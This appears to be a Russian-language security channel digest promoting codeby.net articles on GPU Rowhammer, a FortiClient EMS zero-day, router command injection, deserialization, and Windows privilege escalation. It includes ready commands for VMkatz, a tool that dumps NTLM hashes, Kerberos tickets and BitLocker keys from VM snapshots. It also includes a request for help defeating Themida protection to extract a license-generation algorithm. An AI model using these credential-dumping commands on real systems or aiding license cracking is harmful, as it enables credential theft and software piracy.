Десять лет Rowhammer был исключительно про оперативную память CPU. DDR3, DDR4, DDR5 — бесконечная гонка между атакующими и производителями памяти. Но видеопамять GPU всё это время считалась безопасной: ну сломал точность нейросети с 80% до 60% — и что с того?
🔬 Три препринта 2025–2026 годов — GDDRHammer, GeForge и GPUBreach — переводят разговор в другую плоскость. Речь уже не о деградации модели, а о полноценной эскалации привилегий до root через аппаратный сбой в GDDR6.
Физика та же: ячейки DRAM расположены настолько плотно, что многократное обращение к одной строке создаёт электрические помехи в соседних. Конденсаторы теряют заряд, биты переключаются — 0 становится 1. Впервые эффект задокументировали в 2014 году на DDR3, и с тех пор исследователи научились через bit flip рутить Android, красть 2048-битные криптоключи и обходить ECC. Но всё это касалось только CPU-памяти.
⚡️ Что умеют три новые атаки:
• GDDRHammer — 129 bit flip на банк в NVIDIA RTX A6000. Атака модифицирует таблицу страниц последнего уровня и перенаправляет виртуальные адреса GPU на физическую память CPU через PCIe. Требует отключённого IOMMU.
• GeForge — 1171 bit flip на RTX 3060, атакует каталог страниц целиком. Результат: открытый root shell на хосте. Тоже нужен отключённый IOMMU.
• GPUBreach — и вот здесь интереснее. По данным исследователей из University of Toronto, атака работает даже с включённым IOMMU. Вместо прямого маппинга GPU-адресов на CPU-память — что IOMMU запрещает — GPUBreach повреждает метаданные в буферах, к которым GPU уже имеет легитимный доступ. Затем эксплуатируются memory-safety баги в самом драйвере NVIDIA, который работает с привилегиями ядра. IOMMU не помогает: записи происходят на стороне CPU, а не GPU.
🎯 Почему это важно для пентестеров? Облачные GPU-окружения — это мультитенантная среда, где несколько клиентов делят один физический ускоритель. Если атака позволяет выйти из GPU-контекста в память CPU хоста — это уже не академический сценарий. Стоит уточнить: препринты пока не прошли независимую верификацию, и числа основаны на вторичных источниках. Но сама возможность обхода IOMMU через драйвер уже меняет то, как стоит думать о безопасности GPU-инфраструктуры.
📖 Полный разбор kill chain каждой атаки, детали memory massaging и что можно воспроизвести в лаборатории — в статье на форуме.
https://codeby.net/threads/gpubreach-rowhammer-ataka-gpu-s-eskalatsiyei-privilegii-do-root-polnyi-razbor-kill-chain.92830/
Пасхальная суббота, взломанная инфраструктура и CVE без патча
31 марта 2026 года сенсоры watchTowr зафиксировали активную эксплуатацию уязвимости, для которой не существовало ни advisory, ни патча. Четырьмя днями позже, в пасхальную субботу, Fortinet выкатила бюллетень. К тому моменту атакующие уже сидели внутри.
🎯 Почему праздники? SOC работает в полсилы, дежурный смотрит в потолок, а окно между компрометацией и детектом растягивается с часов до дней. CEO watchTowr сказал об этом прямо: атакующие давно поняли, что праздники — лучшее время для работы.
CVE-2026-35616 — pre-auth RCE с CVSS 9.8 в FortiClient EMS версий 7.4.5–7.4.6. Не академическая строчка из бюллетеня, а рабочий zero-day, который эксплуатировался до публикации патча.
🔍 Что такое FortiClient EMS и почему это главная цель?
FortiClient EMS — не просто сервер мониторинга. Это центральный management plane всей endpoint-инфраструктуры Fortinet. Через него проходит всё: VPN-политики, compliance-проверки, телеметрия с агентов, интеграция с FortiSandbox и FortiGate.
Компрометация EMS на red team — это джекпот. Атакующий получает:
• управление защитой на всех endpoint'ах
• возможность раскатывать произвольные пакеты через легитимный push-механизм
• доступ к телеметрии с VPN-токенами
• манипуляцию FortiSandbox-интеграцией
По данным Shadowserver, около 2000 экземпляров FortiClient EMS торчат в интернет напрямую — вопреки всем рекомендациям Fortinet. Но кого когда останавливали рекомендации.
⚙️ Почему баг вообще работает?
Вектор CVSS:3.1/AV:N/AC:L/PR:N/UI:N — это значит: удалённо, без сложных условий, без учётки, без каких-либо действий со стороны жертвы. Один запрос — один результат.
Корневая причина — отсутствие auth-middleware на конкретных API-эндпоинтах. Механизм аутентификации не взламывается и не обходится через инъекцию — он просто не применяется к определённым запросам. Разработчики добавили новый route, забыли навесить auth-декоратор — классика жанра. Такой паттерн встречается при аудите корпоративных REST API регулярно.
Отдельный момент: в русскоязычных источниках гуляет ошибка — якобы версия 7.4.6 закрывает уязвимость. Это неверно. По NVD, уязвимы обе версии — и 7.4.5, и 7.4.6. Исправление только через обновление до 7.4.7.
🔗 Параллельный вектор
CVE-2026-35616 — не изолированный случай. CVE-2026-21643 — SQL-инъекция в версии 7.4.4 с тем же CVSS 9.8 и идентичным вектором. Два разных класса уязвимостей, один и тот же критический уровень, одна и та же цель. FortiClient EMS явно требует более глубокого security-аудита.
Полная механика эксплуатации — от разведки и API bypass до lateral movement через Fortinet-инфраструктуру — в статье на форуме.
https://codeby.net/threads/cve-2026-35616-ekspluatatsiya-uyazvimosti-forticlient-ems-ot-api-bypass-do-zakhvata-fortinet-infrastruktury.92827/
Почему Nmap без kill chain — просто сканер портов
Каждый раз, когда я веду воркшоп для начинающих, первый вопрос всегда один: «Какие инструменты установить?» И каждый раз я отвечаю встречным: «А на каком этапе атаки ты сейчас находишься?»
Разница между джуном и опытным пентестером не в количестве утилит, а в понимании — зачем конкретный инструмент запускается именно сейчас. Nmap без контекста — просто сканер портов. Nmap в начале kill chain — разведывательный модуль, от которого зависит весь дальнейший вектор атаки.
🔍 Большинство гайдов по инструментам хакера строятся как плоский список: вот Nmap, вот Metasploit, вот Wireshark — пользуйтесь. Это примерно как дать человеку скальпель, пилу и зажим и сказать: «Теперь ты хирург». Без понимания последовательности инструменты бесполезны.
В реальном пентесте каждый шаг определяет следующий. Сначала разведка — выясняешь, что вообще живёт на периметре. Затем анализ поверхности атаки — ищешь веб-приложения, открытые сервисы, точки входа. Потом эксплуатация — превращаешь найденную уязвимость в доступ. После — повышение привилегий и перемещение по сети.
⚡ MITRE ATT&CK формализует эту логику. Каждой фазе соответствуют конкретные техники. Запускаешь Nmap — выполняешь Network Service Discovery (T1046). Пробиваешь веб-форму через SQLmap — Exploit Public-Facing Application (T1190). Перебираешь пароли Hydra — Brute Force (T1110). Такой подход делает пентест системным и позволяет писать отчёты, которые заказчик реально может использовать.
🛠 Что конкретно даёт привязка к kill chain? Возьмём типичный вывод nmap -sV -sC -p- 10.10.10.100:
• Порт 22 с OpenSSH 7.9 — проверяем на известные CVE, но скорее всего идём через веб
• MySQL на порту 3306 торчит наружу — потенциальный вектор брутфорса (зачем он вообще открыт на периметре?)
• Apache Tomcat 9.0.30 на 8080 — горячая находка: старые версии часто содержат дыры в менеджере деплоя
Это не просто список открытых портов. Это карта решений: куда идти дальше, что фаззить, что брутить, где искать CVE.
🎯 Опытные пентестеры при работе с десятками хостов комбинируют инструменты: Masscan делает быстрое первичное сканирование всех портов, а Nmap с флагом -sV точечно добивает найденное. NSE-скрипты добавляют глубину: smb-vuln-ms17-010 проверяет EternalBlue, ssl-heartbleed обнаруживает Heartbleed, а http-enum находит стандартные директории веб-серверов за один проход.
Это лишь первая фаза из десяти. Дальше — Burp Suite, SQLmap, Metasploit, Hydra, Hashcat и другие инструменты, каждый из которых привязан к конкретному этапу атаки. Читай полный разбор в статье 👇
https://codeby.net/threads/instrumenty-pentestera-top-10-s-real-nymi-primerami-v-kazhdoi-faze-ataki.92812/
Альфа-Банк собирает хакеров на соревнования — среди лучших спецов разыгрывают 3 100 000 рублей. В этот раз участвовать могут и школьники — победителям этого трека банк оплатит поездку на научную конференцию.
Такие турниры — хорошая строчка в резюме: участие поможет при трудоустройстве. Соревноваться можно из любой точки мира, нужно только зарегистрироваться до 25 апреля.
Регистрация
Один POST-запрос — и ты root. Без пароля.
🔓 Два command injection в роутере Totolink A7100RU работают без аутентификации. HTTP POST к /cgi-bin/cstecgi.cgi — и атакующий получает полный контроль. PoC уже на GitHub, патча нет.cstecgi.cgi парсит JSON, берёт значение параметра и без проверок скармливает его в system() через sprintf(). Параметр ttyEnable, задуманный как булевый флаг, принимает строку любой длины с shell-метасимволами.
⚙️ В статье:
• Распаковка прошивки через binwalk и анализ MIPS-бинарника в Ghidra
• Формирование запросов для CVE-2026-6112 и CVE-2026-6113
• Готовые Suricata-правила для детекции
MITRE ATT&CK, CVSS 4.0 и разбор CWE-77/CWE-78 на реальном коде — в статье:
https://codeby.net/threads/cve-2026-6112-i-cve-2026-6113-uyazvimost-command-injection-v-totolink-a7100ru-ot-analiza-proshivki-do-detektsii.92788/
Непонятный blob в cookie → reverse shell за 30 секунд
За этой «магией» — конкретная механика, которую важно понять, чтобы не застрять в поиске gadget chain на три вечера.
🔍 Как распознать формат в трафике:
• Java: Base64 начинается с rO0AB (байты ac ed 00 05)
• PHP: маркеры O:, a:, s: — читаются глазами
• Python pickle: бинарный поток с байтом \x80
⚙️ Ключевой инсайт: уязвимость — не в библиотеке вроде Apache Commons Collections, а в приложении, которое скармливает недоверенные данные в readObject(). Библиотека в classpath — не дыра. Дыра — когда пользовательский ввод до неё добирается.
Дальше: как подобрать gadget chain через ysoserial и phpggc, какие CVE эксплуатировать на WebLogic и PHP-фреймворках, и как строить цепочки вручную.
https://codeby.net/threads/uyazvimosti-deserializatsii-ekspluatatsiya-cherez-ysoserial-phpggc-i-postroyeniye-gadget-chain.92777/
Burp Suite + OWASP Top 10: какой плагин ставить и зачем
Один extension на каждую категорию OWASP:
• A01 Broken Access Control → Autorize: вставил cookie низкопривилегированного юзера, браузишь как админ — красный «Bypassed!» = готовый IDOR
• A03 Injection → ActiveScan++: добавляет XXE, SSTI, улучшенный SQLi
• A04 Insecure Design → Turbo Intruder: race conditions на промокодах — тысячи req/sec
• A07 Auth Failures → JWT Editor: атаки alg:none, weak secret, key confusion из Repeater
• A10 SSRF → Collaborator Everywhere: браузишь приложение, extension инжектирует заголовки и ловит out-of-band callbacks
Плюс Param Miner (до 65 000 параметров за запрос) и Retire.js для уязвимых JS-библиотек.
https://codeby.net/threads/burp-suite-extensions-shpargalka-po-owasp-top-10-2025-kakoi-plagin-stavit-i-zachem.92768/
Инструмент для извлечения учетных данных Windows (хэши NTLM, мастер-ключи DPAPI, билеты Kerberos, кэшированные учетные данные домена, секреты LSA, NTDS.dit, ключи BitLocker) непосредственно из снимков памяти и виртуальных дисков на сетевом хранилище, в гипервизоре и везде, где находятся файлы виртуальной машины.
git clone https://github.com/nikaiw/VMkatz.git
cd VMkatz
cargo build --release --target x86_64-unknown-linux-musl
cd target/x86_64-unknown-linux-musl/release
./vmkatz —help
./vmkatz snapshot.vmsn
./vmkatz /path/to/vm-directory/
./vmkatz --bitlocker-fvek /tmp/keys snapshot.vmsn
./vmkatz -r /vmfs/volumes/datastore1/
SeImpersonatePrivilege — и ты уже на полпути к SYSTEM
Получил reverse shell от доменного юзера. whoami /priv — стандартный набор, ничего интересного. Что дальше?
🎯 Порядок приоритетов при LPE:
1. Токен — SeImpersonatePrivilege у сервисных аккаунтов IIS/MSSQL открывает Potato-атаки прямо к SYSTEM
2. Сервисы — Unquoted Service Path встречается на каждом втором пентесте, а SERVICE_CHANGE_CONFIG для группы Users — прямой билет наверх
3. UAC bypass — десятки техник без GUI, когда застрял на medium integrity
4. Kernel exploits — последнее средство: объяснять заказчику BSOD на продакшне — сомнительное удовольствие
⚡ Если оба ключа AlwaysInstallElevated выставлены в `1` — любой MSI устанавливается от SYSTEM.
Полный разбор техник, команд и нюансов эксплуатации:
https://codeby.net/threads/povysheniye-privilegii-windows-ekspluatatsiya-miskonfiguratsii-tokenov-i-obkhod-uac-na-praktike.92759/
WPProbe: Инструмент для сканирования и оценки безопасности WordPress
WPProbe — это высокопроизводительный сканер безопасности с открытым исходным кодом, предназначенный для обнаружения установленных плагинов и тем WordPress, а также их сопоставления с известными уязвимостями из баз данных Wordfence и WPScan. Инструмент использует WordPress для скрытного обнаружения компонентов, что позволяет минимизировать риск блокировки со стороны систем безопасности. WPProbe разработан для использования специалистами по тестированию на проникновение, администраторами сайтов и исследователями безопасности.
sudo apt install wpprobe
wpprobe -h
#с указанием ключа
wpprobe update-db --api-key ваш_wordfence_api_ключ
#или через переменную окружения
export WORDFENCE_API_KEY=ваш_ключ
wpprobe update-db
wpprobe scan -u https://example.com
#скрытный режим (по умолчанию)
wpprobe scan -u https://example.com --mode stealthy
#агрессивный режим (прямой перебор)
wpprobe scan -u https://example.com --mode bruteforce
#гибридный режим
wpprobe scan -u https://example.com --mode hybrid
wpprobe scan -f targets.txt -t 20
#CSV формат
wpprobe scan -u https://example.com -o results.csv
#JSON формат
wpprobe scan -u https://example.com -o results.json
wpprobe search --cve CVE-2024-1234
wpprobe update-db
wpprobe scan -u https://client-site.com -o scan_report.csv
wpprobe search --severity critical --details
wpprobe search --plugin newly-acquired-plugin-name
Themida снята через unlicense — но динамический анализ не живёт.
ScyllaHide падает в Fatal Error 0x00005c, KsDumper молчит, TitanHide крашит процесс. Патч от третьих лиц через MinHook непонятным образом проходит проверку контрольной суммы импортов и переводит приложение с Dongle-проверки на сверку лицензии с файлом в папке. Алгоритм генерации этого файла — внутри. Но добраться до него не получается: защищённые .dll, замусоренный трейс после MinHook_Initialise_Hook, и приложение ещё и детектит VM.
🎯 Что уже стоит на столе у автора:
• Unlicense отработал, IAT и OEP восстановлены — есть unpacked_.exe для статики
• MinHook в чужом патче почему-то проходит CRC-проверку импортов/экспортов — и это само по себе вопрос
• Динамика умерла: 64dbg + ScyllaHide = Violation Access, чем больше опций включено, тем стабильнее краш
• Подозрение, что оригинальный алгоритм генерации затёрт, а рабочий спрятан в injected DLL — тоже под Themida
🔍 У человека конкретные три вопроса: как отличить hooked-функцию от динамически подгруженной из уже пропатченных библиотек, стоит ли дальше копать динамику через обход debugger detection, и как снимать защиту с .dll если она под VMProtect сверху. Если кто-то воевал с Themida на .dll или разбирался с injected MinHook-патчами без исходников — загляните, человек не новичок, но застрял на 4-й день.
https://codeby.net/threads/vopros-khuk-vytashchit-algoritm-generatsii-themida.92760/